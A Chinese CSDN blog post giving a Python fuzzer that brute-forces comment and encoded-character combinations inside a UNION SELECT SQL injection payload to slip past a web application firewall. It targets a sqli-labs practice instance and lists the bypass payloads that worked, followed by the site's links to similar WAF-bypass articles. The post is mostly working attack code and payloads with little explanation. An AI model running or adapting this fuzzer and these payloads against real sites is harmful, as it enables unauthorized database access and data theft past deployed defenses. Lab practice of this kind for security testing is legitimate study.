fuzz绕waf

于 2021-11-17 23:30:16 发布
阅读量2k 收藏
点赞数
分类专栏: 工具 文章标签: python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41048303/article/details/121390476
版权

fuzz绕waf(SQL注入)

1.fuzz.py

import requests
import sys

fuzz_zs = ['/*', '*/', '/*!', '/**/', '?', '/', '*', '=', '`', '!', '%', '.', '-', '+']
fuzz_sz = ['']
fuzz_ch = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j","%0k","%0l","%0m","%0n"]

fuzz = fuzz_zs + fuzz_sz + fuzz_ch
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36"}
url_start = "http://192.168.254.198/sqli-labs/Less-1/?id=-1'"
# http://192.168.254.182/sql-labs/Less-1
len = len(fuzz) ** 5
num = 0
for a in fuzz:
    for b in fuzz:
        for c in fuzz:
            for d in fuzz:
                for e in fuzz:
                    num += 1
                    payload = "/*!union/*/*!?*/%0bselect*/ 1,2,database"+a+b+c+d+e+"() --+"
                    url = url_start + payload
                    sys.stdout.write(' ' * 30 + '\r')
                    sys.stdout.flush()
                    print("Now URL:" + url)
                    sys.stdout.write("完成进度:%s/%s \r" % (num, len))
                    sys.stdout.flush()
                    res = requests.get(url, headers=headers)
                    #print(res.text)
                    if "Password" in res.text:
                        with open("Results.txt", 'a', encoding='utf-8') as r:
                            r.write(url + "\n")

2.payload

payload根据测试的结果依次进行更改
绕过union select:"/*!union" + a + b + c + d + e + "select*/ 1,2,3 --+"
结果:"/*!union/*/*!?*/%0bselect*/ 1,2,3 --+"

绕过database()"/*!union/*/*!?*/%0bselect*/ 1,2,database"+a+b+c+d+e+"() --+"
结果:/*!union/*/*!?*/%0bselect*/ 1,2,database/*/**//**/%0b() --+
小白头发少
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
waf实战SQL注入fuzz过程
weixin_45983744的博客
02-11 631
QQ交流群:876554035 #01 环境简介 服务器:windows2008 R2 软件:phpstudy20180211 php 5.4.45 mysql 5.5.53 某锁win_3.1.18.13服务端版本 #02 Fuzz过程 以基于union注入为例 fuzz order by 过程如下: ?id=1’ order --+ 不拦截 ?id=1’ order by --+ 拦截 n...
渗透测试-SQL注入之FuzzWAF
lza20001103的博客
04-21 4168
渗透测试-SQL注入之FuzzWAF
FUZZ测试某狗WAF
JBlock的博客
03-17 6465
题记 Fuzz是安全测试的一种方法,也是极为重要的一种手段!当你面对waf无所适从的时候,这时候你就可以Fuzz模糊测试来waf,甚至你可以发现一些意想不到的姿势!最近两天我会对fuzz测试进行介绍!主要内容是Fuzz脚本编写和Fuzz思路!如果你想,这里会有无数种姿势让你bypass! 文章目录题记正文环境准备FUZZ思路后记 正文 环境准备 测试靶场:sql-libs 安全软件:某狗最新版...
sql注入waf小Tips
Zlirving_的博客
07-04 651
因为对上次比赛sql的题挺不甘心 所以又着重复习了一遍sql,并记录了平常waf的点 手工bypass要点 先通过破坏关键字测试出拦截规则 之后进行针对性过 Mysql 前期详解:传送门 1.1、联合注入 0x01 and过 直接 and 1=1 直接就会被拦截 在数值的前面加特殊符号干扰匹配规则进行过 在这里使用取反符号’-‘或者取逻辑位非运算符号’~'进行过 and = && or = || %26 == & 0x02 对order by ——> 判断表的字段
backfuzz - protocol fuzzing toolkit (Python编写)
Yatere的天平秤
05-10 2358
一个协议fuzzer工具,支持文件fuzzer。 研究模糊化的人可以参考代码。也是用python写的。 https://github.com/localh0t/backfuzz 可以翻墙看看这个: http://localh0t.blogspot.com/2012/03/backfuzz-protocol-fuzzing-toolkit.html
sql_fuzz-检测waf过滤关键字字典.txt
09-26
非常全面的SQL注入关键字检测字典,检测网站waf过滤了哪些关键字的字典,配合burpsuit使用非常有效。
附录:WAF自动化FUZZ脚本1
08-03
附录:WAF自动化FUZZ脚本1
Writing a fuzzer using the Fuzzled framework
01-06
Writing a fuzzer using the Fuzzled framework By SecDark . Gnusec JFFun
SQL关键字字典.txt
07-14
sql注入中,常见的关键字,可用于快速fuzz,判断waf规则。简单实用,推荐配合burp使用
收集文件:质量安全文章的收集。 很棒的文章
01-31
收集文件:质量安全文章的收集。 很棒的文章
多线程FUZZ WAF的python脚本
夜班机器人的博客
02-09 2351
#!/usr/bin/python #coding:utf-8 ''' 学习了Va1n3R的注入过思路,自己也学习一下fuzz脚本的编写 规则库还是使用Va1n3R的 fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00'] fuzz_sz ...
【Python】多线程Fuzz&&Waf异或免杀&爆破
share something here
04-11 541
【Python】多线程Fuzz&Waf异或免杀&爆破学习内容和目的简单多线程脚本利用FTP模块实现协议爆破脚本不含多线程简单爆破引入queue和threading配合Fuzz实现免杀异或Shell脚本 注意sys.argv传参数必要时需要转换int型。 学习内容和目的 知识点:协议模块使用,Request爬虫技术,简易多线程技术,编码技术,Bypass后门技术 学习目的:掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合Fuzz吊打Waf 简单多线程脚本 queue,threa
浅谈WEB Fuzz中需要关注的7种响应
Coisini的博客
06-21 1480
WEB应用模糊测试(WEB Fuzz)是一种特殊形式的网络协议模糊测试,专门关注遵循HTTP规范的网络数据包。 WEB Fuzz并不是新的概念,目前有多种WEB应用模糊测试器(WEB Fuzzer),比如SPIKE Proxy、SPI Fuzzer、besTORM,以及渗透人员喜爱的Burp Suite。 在Fuzz请求完成后,目标应用发回来的响应提供了Fuzz请求所造成影响的各种线索。如果发现...
我的WafBypass之道(SQL注入篇)
热门推荐
wjy397的专栏
11-21 1万+
https://xianzhi.aliyun.com/forum/mobile/read/349.html 先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。   先知技术社区投稿邮箱:[email protected]; 有高清无码pdf版本在文末。。。 Author:Tr3jer_CongRon
WAF Bypass FUZZ小脚本
06-27 733

 分享两个小脚本,用来WAF Bypass简单FUZZ的
 第一个:先生成一个字典,带入搭建的环境进行FUZZ,针对某些软WAF挺好用的,可FUZZ出不少姿势出来,记得先把CC攻击加入白名单才行哦。。。
 
 #! /usr/bin/env python
 # _*_ coding:utf-8 _*_
 import url...
WAF运行命令执行漏洞的方法大全
hackzkaq的博客
10-09 2076
文章目录**前言****一、windows下**二、进入linux三、一个有趣的例子总结 前言 作者:掌控安全-桐镜 今天发散一下思维,聊聊关于命令执行漏洞过过滤的方法,让我们一起由浅入深。 一、windows下 1.1 符号与命令的关系 在看一个例子开始之前,首先了解一点,”和^这还有成对的圆括号()符号并不会影响命令的执行。在windows环境下,命令可以不区分大小写 whoami //正常执行 w"h"o"a"m"i //正常执行 w"h"o"a"m"i" //正常执行 wh"“oami //正常执
用最短的payloadWAF(入门)
dfdhxb995397的博客
11-02 682
本文作者:jishuzhain <font color=green>想过一个WAF,我们可以用最短的payload来做,这里只是基础示例,望各位大佬勿喷,小弟在此谢过。</font> 我在这里先使用一个网页举例。 <script>alert(1)</script> 然后输入经典的payload 拒绝访...
【WEB安全】某waf实战SQL注入fuzz过程
yijinbaiyi的博客
01-17 410
【WEB安全】某waf实战SQL注入fuzz过程 #01 环境简介 服务器:windows2008 R2 软件:phpstudy20180211 php 5.4.45 mysql 5.5.53 某锁win_3.1.18.13服务端版本 #02 Fuzz过程 以基于union注入为例 fuzz order by 过程如下: ?id=1’ order --+ 不拦截 ?id=1’ order b...
CTF练习:综合测试低难度
qq_43233085的博客
12-11 1022
CTF练习:综合测试低难度环境准备信息收集fuzz注入上传shell进入靶机与提权 靶机地址: 链接: https://pan.baidu.com/s/1dUDG3Lxj2-It9_EC0T7XyA 提取码: 4s12 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.91.8 查看靶机的IP,为172.19.91....
scapy fuzz
最新发布
09-28
其中fuzz()函数是Scapy库中的一个重要函数,用于生成具有不同变体的数据包,以便测试网络设备和应用程序的鲁棒性和安全性。 使用fuzz()函数,您可以对数据包的各个字段进行模糊测试,例如IP地址、端口号、协议类型...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值